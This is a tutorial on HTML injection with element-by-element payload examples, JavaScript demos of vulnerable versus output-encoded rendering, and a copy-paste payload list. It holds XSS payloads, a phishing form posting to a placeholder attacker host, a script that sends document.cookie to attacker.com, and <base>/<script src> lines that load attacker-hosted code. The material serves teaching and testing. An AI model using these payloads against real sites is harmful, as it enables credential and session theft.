HTML Injection
Have you ever wondered how attackers can mess with websites just by typing something unexpected into a login form or a search bar?
That’s where HTML Injection comes in! It’s a sneaky little trick where an attacker injects HTML markup into a web page, making it display content the site never intended. Unlike other injection attacks (like SQLi or XSS), HTML Injection is about manipulating what users see: changing text, adding fake forms, or embedding phishing links right inside a page served from the trusted domain, which is exactly why victims believe it.
Imagine filling out a contact form and instead of your message, the page suddenly displays a giant flashing banner that says, "You’ve won a million dollars! Click here!" Yeah, that’s HTML Injection at work. Sounds wild, right? Let’s break down how it works and why it happens.
How Does HTML Injection Work?
HTML Injection happens when a web application improperly handles user input, allowing attackers to inject HTML code into a webpage. This can alter the page’s structure, content, or even trick users into interacting with fake elements.
Structure of HTML Injection
HTML Injection follows a simple flow: Input → Processing → Execution → Impact
Input: Malicious Payload Injection
- Threat actors exploit unsanitized input vectors to inject arbitrary HTML payloads.
- Common attack surfaces: dynamically rendered user inputs in forms, comment sections, search queries, and URL parameters.
Processing: Insecure Input Handling
- The web application lacks input validation and, more importantly, context-aware output encoding of user data before it is written into the page.
- The injected HTML is either persistently stored in the database (stored HTML injection) or reflected dynamically on the web page (reflected HTML injection).
Execution: Client-Side Rendering & DOM Manipulation
- The browser parses and renders the injected HTML as legitimate markup, so the attacker's elements become part of the page's DOM on the trusted origin.
- This results in unauthorized UI manipulation, phishing vectors, or deceptive overlays.
Impact: Security Exploitation & Threat Escalation
- Website defacement via injected HTML elements.
- Credential harvesting through fake authentication interfaces rendered on the legitimate domain.
- Clickjacking & UI redressing that trick users into submitting data or clicking attacker-chosen links.
- If the injected markup can also execute script (event handlers, <script>, javascript: URLs), the issue is XSS and escalates to session hijacking or actions in the victim's session; pure HTML injection stops at what the user sees.
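The Input → Processing → Execution flow above, as an added example that is not code from the original page: a search page that reflects the query, shown vulnerable, behind a script-only blocklist, and with proper output encoding, plus the check a tester runs to tell the three apart. The probe, the page markup and the attacker host (attacker.example) are constructed for the demonstration.

```javascript
// Added example, not code from the original page: a search page that reflects
// the query string, shown vulnerable, behind a script-only blocklist, and with
// proper output encoding. The probe, page markup and attacker host are
// constructed for the demonstration.

// Vulnerable: user input is concatenated straight into the markup.
function renderSearchVulnerable(query) {
  return `<html><body><h2>Results for: ${query}</h2></body></html>`;
}

// Common mistake: a blocklist that only strips <script> tags. It stops the
// alert(1) proof-of-concept but lets a fake login form straight through,
// which is exactly the HTML-injection case.
function renderSearchBlocklist(query) {
  const filtered = query.replace(/<\/?script\b[^>]*>/gi, '');
  return `<html><body><h2>Results for: ${filtered}</h2></body></html>`;
}

// Encode the characters that change meaning in an HTML text or attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened: the same page, with the query encoded before it reaches the markup.
function renderSearchSafe(query) {
  return `<html><body><h2>Results for: ${escapeHtml(query)}</h2></body></html>`;
}

// Tester's check: reflect a probe that contains a tag and classify how it came
// back. 'markup' = the tag survived unchanged (the page is injectable),
// 'escaped' = it was entity-encoded, 'absent' = stripped or not reflected at all.
function classifyReflection(responseBody, probe) {
  if (responseBody.includes(probe)) return 'markup';
  if (responseBody.includes(escapeHtml(probe))) return 'escaped';
  return 'absent';
}

// Constructed probe: a phishing form pointing at a placeholder attacker host.
const PROBE =
  '<form action="https://attacker.example/collect">Session expired, sign in again: ' +
  '<input name="u"><input name="p" type="password"><button>Sign in</button></form>';

// Run all three renderers against the probe and report how each reflects it.
function compareRenderers(probe = PROBE) {
  return {
    vulnerable: classifyReflection(renderSearchVulnerable(probe), probe),
    blocklist: classifyReflection(renderSearchBlocklist(probe), probe),
    hardened: classifyReflection(renderSearchSafe(probe), probe),
  };
}

console.log(compareRenderers());
// { vulnerable: 'markup', blocklist: 'markup', hardened: 'escaped' }
```

The blocklist renderer is the case worth remembering: a filter tuned to kill `alert(1)` reports the sink as fixed while the phishing form still renders. Encoding at output, in the context where the data lands, is the only reliable fix.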
Common Applications Vulnerable to HTML Injection
- Blog & News Websites – Comment sections, user-generated content.
- Forums & Message Boards – User posts, signatures, profiles.
- E-Commerce Platforms – Product reviews, feedback forms.
- Search Engines – Search bar displaying unescaped input.
- User Profile Pages – Editable bio sections, display names.
- Login & Signup Forms – Error messages reflecting user input.
- Support & Contact Forms – Ticket submissions, chat support.
- Social Media Platforms – Posts, messages, bios.
- Online Surveys & Polls – User-submitted responses.
- URL Parameters & Redirects – Sites reflecting query strings directly in the UI.
Types of HTML Injection
1. Heading Tags & Text Formatting
Heading and text-formatting tags run no script on their own; their value to an attacker is in making injected text look like the site's own content.
- <h1> to <h6> (Headings): Used to disguise phishing messages or misleading alerts as page headlines.
- <b>, <i>, <u> (Text Formatting): Emphasizes fake warnings, scams, or misleading instructions.
- <marquee> (Scrolling Text, deprecated but still rendered): Creates persistent, attention-grabbing malicious messages.
- <font> (deprecated): Alters text color and size to camouflage phishing links or warnings.
<h1>HTML</h1>
<h2>HTML</h2>
<h3>HTML</h3>
<h4>HTML</h4>
<h5>HTML</h5>
<h6>HTML</h6>
<b>HTML</b>
<i>HTML</i>
<u>HTML</u>
<mark>HTML</mark>
<strong>HTML</strong>
<em>HTML</em>
<small>HTML rocks</small>
<del>Html</del>
<ins>Html</ins>
<s>Only 50 tickets left</s>
<sub>Html</sub>
<sup>Html</sup>
2. Paragraphs, Line Breaks & Preformatted Text
Paragraph and whitespace elements cannot execute scripts; they are used to shape injected text so it blends with, or displaces, legitimate content.
- <p> (Paragraphs): Inserts fake warnings or phishing messages in the page's own paragraph styling.
- <br> (Line Breaks): Pushes legitimate content down or off-screen, and can split a payload across lines to evade naive single-line pattern filters.
- <pre> (Preformatted Text): Preserves whitespace, so injected text can mimic system output, error dumps, or ASCII-art defacement.
- <blockquote cite="...">: Lends injected text the appearance of a quoted, sourced statement.
<p>HTML</p>
<pre>HTML</pre>
<blockquote cite="http://google.com">HTML Injection</blockquote>
Html<br>line breaks<br>injection
3. Links & Navigation
These elements redirect users, point them at attacker-controlled destinations, or load attacker-controlled content inside the trusted origin.
- <a> (Anchor): Injects phishing links; with the download attribute it offers a file for download, and a link through an open-redirect endpoint hides the final destination.
- <base> (Base URL): Changes how every relative URL on the page resolves, so the page's own links, forms and scripts can be redirected to an attacker host.
- <iframe> (Inline Frame): Embeds an attacker-controlled page (for example a fake login) inside the trusted origin's UI; a Content-Security-Policy frame-src directive on the victim site is the usual mitigation.
- <nav> (Navigation): Adds a fake navigation block to mislead users or send traffic to phishing pages.
<a href="https://www.google.com">HTML</a>
<nav>Html</nav>
4. Forms & Input Elements
Injected forms and inputs are the classic HTML-injection phishing vector: a fake form rendered on the legitimate domain, with the browser's address bar showing the real site.
- <form>: A fake login form whose action points at an attacker host captures credentials. A form with no action attribute submits to the current page; with method="GET" the credentials still end up in the URL, where they appear in server logs, browser history and Referer headers.
- <input>: Hidden inputs add attacker-chosen fields to a submission; a type="password" field makes the fake form look authentic.
- <textarea>: Presents a free-text prompt (for example "paste your recovery code") to harvest sensitive data; it does not execute scripts.
- <button>: Labels an attacker link or form submission as a legitimate action.
- <select> & <option>: Builds fake choices whose submission is routed to the attacker.
<form method="GET">Username: <input type="text" name="username" value="" /><br />Password: <input type="password" name="passwd" value="" /><br /><input type="submit" name="submit" value="login" /></form>
<form method="POST">Username: <input type="text" name="username" value="" /><br />Password: <input type="password" name="passwd" value="" /><br /><input type="submit" name="submit" value="login" /></form>
<input type="text" id="name" name="name">
<select name="cars" id="cars"></select>
<button type="button">Click Me!</button>
<textarea id="HTML" name="HTML" rows="4" cols="50">Html injected</textarea>
<label for="html">HTML</label>
<legend>Html</legend>
<meter id="html" value="2" min="0" max="10">2 out of 10</meter>
<progress id="html" value="32" max="100"> 32% </progress>
<datalist id="html"><option value="html"></option></datalist>
<fieldset><legend>hello:</legend><label for="fname">First name:</label><input type="text" id="fname" name="fname"><br><br><input type="submit" value="Submit"></fieldset>
5. Multimedia Elements (Images, Video, Audio)
Multimedia elements load attacker-chosen resources and can leak information about the viewer; script execution through event handlers is XSS, not plain HTML injection.
- <img>: An attacker-hosted image URL logs each viewer's IP address and User-Agent; with an onerror or onload attribute the payload becomes XSS.
- <video> & <audio>: Load attacker-controlled media, for example a fake "voice message from support" carrying social-engineering content.
- <source> & <track>: Point the media at attacker-hosted files or subtitle tracks.
- <embed> & <object>: Embed an external document, including HTML, inside the page.
<img src="index.jpg" alt="Girl in a jacket" width="500" height="600">
<video width="320" height="240" controls></video>
<audio controls><source src="demo.ogg" type="audio/ogg"><source src="demo.mp3" type="audio/mpeg"></audio>
<embed type="text/html" src="index.html" width="500" height="200">
6. Lists & Tables
Lists and tables contain no scripting of their own; attackers use them to build convincing fake content (an "order summary", a price list) or to break the page layout. Event handlers on these elements would make it XSS.
- <ul>, <ol>, <li>: Insert fake instructions or step lists into user-visible content.
- <table>, <tr>, <td>: Lay out a fake invoice, account summary or login box so it matches the site's own tables.
- <th> & <caption>: Give injected tables headers and titles that look official.
- <colgroup> / <col style="...">: Inline styles recolour existing table columns and break the page layout.
<ul><li>Html</li></ul>
<ol><li>Html</li></ol>
<table><th>HTML</th><th>HTML</th></table>
<colgroup><col span="2" style="background-color:red"></colgroup>
<dl><dt>Html</dt><dd>Html</dd></dl>
7. Structural Elements & Metadata
Structural and metadata elements let injected content impersonate whole page regions or change page-level behaviour.
- <header>, <footer>, <section>, <article>, <aside>: Inject fake page regions (an announcement banner, a footer with attacker contact details) that inherit the site's layout styles.
- <meta http-equiv="refresh" content="0;url=https://...">: Redirects the viewer to another site. Modern browsers do not follow javascript: URLs given here, so this is a redirect vector, not a script vector.
- <base>: Rewrites relative URL resolution for the whole page (see Base, Scripts & Styles below).
- <details> / <summary>: Hides part of the payload behind a clickable disclosure widget.
<body><h1>HTML html</h1></body>
<header>HTML html</header>
<footer>HTML html</footer>
<main>Html</main>
<section>HTML</section>
<article><h2>Armour Infosec</h2></article>
<aside>Html</aside>
<summary>Html</summary>
<details><summary>HTML</summary><p>html html</p></details>
<address>address,address</address>
8. Encoding Variations & Escaped Characters
Encoded variants of a payload exist to slip past filters that look for raw angle brackets. They only work if some layer of the application decodes the input before it is written into the page; if the encoded form reaches the browser unchanged, it is displayed as literal text rather than parsed as markup.
- URL Encoding (%3Cscript%3E): Converts special characters to their percent-encoded form; the web server or framework decodes it once on receipt.
- Hex/Unicode Entity Encoding (&#x3C;script&#x3E; or &#60;script&#62;): Numeric character references, decoded only if the application entity-decodes input before output (or re-renders it through a step that does).
- Double Encoding (%253Cscript%253E): Percent-encodes the percent sign itself, so one decoding pass yields %3Cscript%3E; bypasses filters that run after the first decode when a second decode follows.
- HTML Entity Encoding (&lt;script&gt;): Named character references; same precondition as numeric entities.
<h1>HTML</h1>
&lt;h1&gt;HTML&lt;/h1&gt;
&#60;h1&#62;HTML&#60;/h1&#62;
%3Ch1%3EHTML%3C%2Fh1%3E
%253Ch1%253EHTML%253C%252Fh1%253E
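The decoding precondition described above, as an added example that is not code from the original page: a constructed model of a server that filters the raw parameter and then percent-decodes it zero, one or two times before building the page. The filter, the server model and the page markup are stand-ins written for this demonstration, not a real framework.

```javascript
// Added example, not code from the original page: a model of a server that
// filters the raw parameter and then URL-decodes it some number of times
// before building the page. It shows which encoded variants of <h1>HTML</h1>
// reach the browser as markup and which arrive as harmless text. The filter
// and server are constructed stand-ins, not a real framework.

// Naive filter: rejects raw angle brackets in the parameter as received.
function blocksRawTags(param) {
  return /[<>]/.test(param);
}

// Server model: run the filter, then percent-decode `passes` times, then
// concatenate into the page. Real stacks decode once at the web server or
// framework; a second decode usually comes from extra application code.
function modelServer(rawParam, passes) {
  if (blocksRawTags(rawParam)) return { blocked: true, body: '' };
  let value = rawParam;
  for (let i = 0; i < passes; i++) {
    try {
      value = decodeURIComponent(value);
    } catch (e) {
      break; // malformed % sequence: leave the value as it is
    }
  }
  return { blocked: false, body: `<p>You searched for ${value}</p>` };
}

// The browser parses <h1> only if the literal characters reach the markup.
// Entity forms such as &lt;h1&gt; are displayed as text, not parsed as a tag.
function rendersAsMarkup(body) {
  return /<h1>/.test(body);
}

// Outcome per payload for 0, 1 and 2 decoding passes: 'blocked', 'markup' or 'text'.
function encodingMatrix() {
  const variants = {
    plain: '<h1>HTML</h1>',
    urlEncoded: '%3Ch1%3EHTML%3C%2Fh1%3E',
    doubleUrlEncoded: '%253Ch1%253EHTML%253C%252Fh1%253E',
    htmlEntities: '&lt;h1&gt;HTML&lt;/h1&gt;',
    numericEntities: '&#60;h1&#62;HTML&#60;/h1&#62;',
  };
  const result = {};
  for (const [name, payload] of Object.entries(variants)) {
    result[name] = [0, 1, 2].map((passes) => {
      const r = modelServer(payload, passes);
      if (r.blocked) return 'blocked';
      return rendersAsMarkup(r.body) ? 'markup' : 'text';
    });
  }
  return result;
}

console.log(encodingMatrix());
```

Reading the matrix: the plain payload is blocked outright, the URL-encoded one lands as markup after the single decode every web server performs, the double-encoded one needs a second decode somewhere in the application, and both entity forms stay text at every depth because nothing here entity-decodes them. When an entity-encoded probe does render as markup, that tells you the application decodes entities before output, which is the finding worth writing up.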
9. Interactive Elements
The payloads usually quoted under "interactive elements" rely on event handlers or javascript: URLs, so they are XSS; the HTML-injection-only equivalents are a form or iframe that points at an attacker host.
- Buttons (<button onclick="alert(1)">Click Me</button>): Script in an event attribute executes on interaction (XSS).
- Forms (<form action="evil.com">): Route user input to an attacker host for data theft (pure HTML injection).
- On-Event Handlers (<div onmouseover="alert(1)">Hover me</div>): Script executes when the user interacts with the element (XSS).
- iframes (<iframe src="javascript:alert(1)">): Runs script in the page's origin (XSS); <iframe src="https://..."> instead embeds attacker content without any script.
- <dialog open>, <details>, <canvas>, <noscript>: Script-free elements that build fake modal prompts or show content only to users who have scripting disabled.
<dialog open>Html</dialog>
<dialog close></dialog>
<iframe src="https://www.google.com" title="test"></iframe>
<iframe id="if1" src="https://www.google.com"></iframe>
<iframe id="if2" src="https://www.google.com"></iframe>
<canvas id="myCanvas">draw htmli</canvas>
<noscript>Sorry, your browser does not support Html</noscript>
10. Time, Data & Other Elements
The time, data and output elements are harmless on their own; every example below only becomes dangerous through its event-handler attribute, which makes it XSS rather than plain HTML injection. They are still useful in HTML-injection tests because filters often allow these uncommon tag names.
- Date & Time (<time datetime="2025-02-08" onmouseover="alert(1)">Hover for surprise</time>): Script in an event attribute.
- Data Attributes (<data value="exploit" onfocus="alert(1)">Click Me</data>): Script in an event attribute; <data> is not focusable without a tabindex attribute, so onfocus will not fire as written.
- Meter & Progress (<meter value="50" max="100" onmouseover="alert(1)">): Script fires when the user hovers over the element.
- Output (<output oninput="alert(1)">Test</output>): Script fires on input events that bubble up from form controls inside it.
<time>10:10</time>
<time datetime="2008-02-14 20:00">HTML</time>
<data value="21053">test html</data>
<wbr>HTML html<wbr>
<bdi>Html</bdi> injection
<bdo dir="rtl">HTML html</bdo>
11. Base, Scripts & Styles
These elements change how the page resolves URLs, or run script outright; the script-running ones are XSS, listed here because an HTML-injection finding is normally triaged by checking whether it escalates to them.
- Base (<base href="https://attacker.example/">): Alters URL resolution, so the page's own relative <script src> and form actions load from, or submit to, the attacker's host with no script in the payload. The javascript: variant (<base href="javascript:alert(1)//">) is a legacy trick; the HTML spec now tells browsers to ignore a javascript: or data: base href.
- Scripts (<script>alert(1)</script>): Direct execution of JavaScript (XSS).
- Event Handlers (<img src="x" onerror="alert(1)">): JavaScript in attributes (XSS).
- Styles (<style>@import 'javascript:alert(1)';</style>): No longer executes script in current browsers; an injected <style> or <link rel="stylesheet"> can still restyle the page, hiding legitimate elements or drawing fake overlays.
<base href="javascript:alert(1)//">
<script>alert(document.cookie);</script>
<script>fetch('https://attacker.com/steal?c='+document.cookie);</script>
<img src="x" onerror="alert(1)">
<body onload=alert(1)>
<base href="https://attacker.com/malicious.js">
<script src="https://attacker.com/malicious.js"></script>
<style>@import url('https://attacker.com/malicious.css');</style>
<link rel="stylesheet" href="https://attacker.com/malicious.css">
<svg onload=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
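The <base> hijack described above, as an added example that is not code from the original page: it resolves a page's own relative <script src> the way the browser does, first without and then with an injected <base>, and shows that the legacy javascript: base is ignored. The page, the document URL (shop.example) and the attacker host (attacker.example) are constructed placeholders, and the regexes are a minimal demonstration rather than an HTML parser.

```javascript
// Added example, not code from the original page: how an injected <base>
// redirects the page's own relative <script src> without the payload
// containing any script. The page, document URL and attacker host are
// constructed placeholders; the regexes are a minimal demonstration, not an
// HTML parser.

// The document base URL is taken from the first <base href> in tree order,
// so an injection that appears before any <base> the page itself sets wins.
function findBaseHref(html) {
  const m = /<base\b[^>]*\bhref\s*=\s*["']?([^"'\s>]+)/i.exec(html);
  return m ? m[1] : null;
}

// Resolve every <script src> as the browser would. Per the HTML spec a
// javascript: or data: base href is ignored and the document URL is used
// instead; any other unparsable base yields null for the affected script.
function resolveScriptSources(html, documentUrl) {
  const injected = findBaseHref(html);
  let base = documentUrl;
  if (injected && !/^(javascript|data):/i.test(injected)) base = injected;
  const sources = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    try {
      sources.push(new URL(m[1], base).href);
    } catch (e) {
      sources.push(null);
    }
  }
  return sources;
}

// Constructed page: a user-controlled greeting followed by a relative script
// include, the layout that makes a <base> injection pay off.
function buildPage(injected) {
  return `<html><head><title>Dashboard</title></head>
<body><div class="greeting">Welcome, ${injected}</div>
<script src="static/app.js"></script></body></html>`;
}

function demo() {
  const docUrl = 'https://shop.example/account/';
  return {
    benign: resolveScriptSources(buildPage('alice'), docUrl),
    hijacked: resolveScriptSources(buildPage('<base href="https://attacker.example/">'), docUrl),
    legacy: resolveScriptSources(buildPage('<base href="javascript:alert(1)//">'), docUrl),
  };
}

console.log(demo());
```

The practical checks this encodes: does the injection point come before the page's own <base> (or does the page have none), and does the page load any script, stylesheet or form action by relative URL? If both hold, a plain HTML injection already delivers attacker-controlled JavaScript, and a Content-Security-Policy base-uri directive is the control that closes it.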
12. HTML Injection Payloads
Collected payloads for quick copy-paste. The first three probe for plain HTML injection; the rest test whether the injection point escalates to XSS. Several of them (javascript: URLs in <link>, <style>, <img>, <table>, <meta>, <object>, <embed> and <base>, plus <frame>, <blink> and <applet>) only fired in old browsers and are kept for completeness and for exercising filters, so a quiet result on one of them is not proof the sink is safe.
<h1>HTML</h1>
<!--qq<h1>HTML</h1>qq<h1>HTML</h1>qq<<h1>HTML</h1><<h1>HTML</h1>>
%253Ch1%253EHTML%253C%252Fh1%253E
<script>alert(1);</script>
<img src=x onerror=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<svg onload=alert(1)>
<body onload=alert(1)>
<link rel="stylesheet" href="javascript:alert(1);">
<style>@import url("javascript:alert(1)");</style>
<base href="javascript:alert(1)//">
<input type="text" value='<script>alert(1)</script>'>
<form action="javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<object data="javascript:alert(1)"></object>
<embed src="javascript:alert(1)">
<a href="javascript:alert(1)">Click me</a>
<marquee onstart=alert(1)>Malicious</marquee>
<video onerror=alert(1)><source src="invalid.mp4"></video>
<details open ontoggle=alert(1)>
<button onclick=alert(1)>Click Me</button>
<audio src=x onerror=alert(1)>
<textarea onfocus=alert(1)>Click here</textarea>
<img src="javascript:alert(1);">
<frame src="javascript:alert(1)"></frame>
<table background="javascript:alert(1)">
<div style="background:url(javascript:alert(1))">
<blink onmouseover=alert(1)>Hover me</blink>
<meta charset="javascript:alert(1)">
<applet code="javascript:alert(1)"></applet>
Writeups
- Exploiting XSS - Injecting into Direct HTML
- Comprehensive Guide on HTML Injection
- Testing for HTML Injection
- Testing For HTML Injection
- Html-Injection
Cheatsheets
- Offensive-Payloads
- HTMLcheathseet
- HTML Injection
- Security Cheat Sheet
- HTML5 Security Cheatsheet
- HTML/JavaScript Comments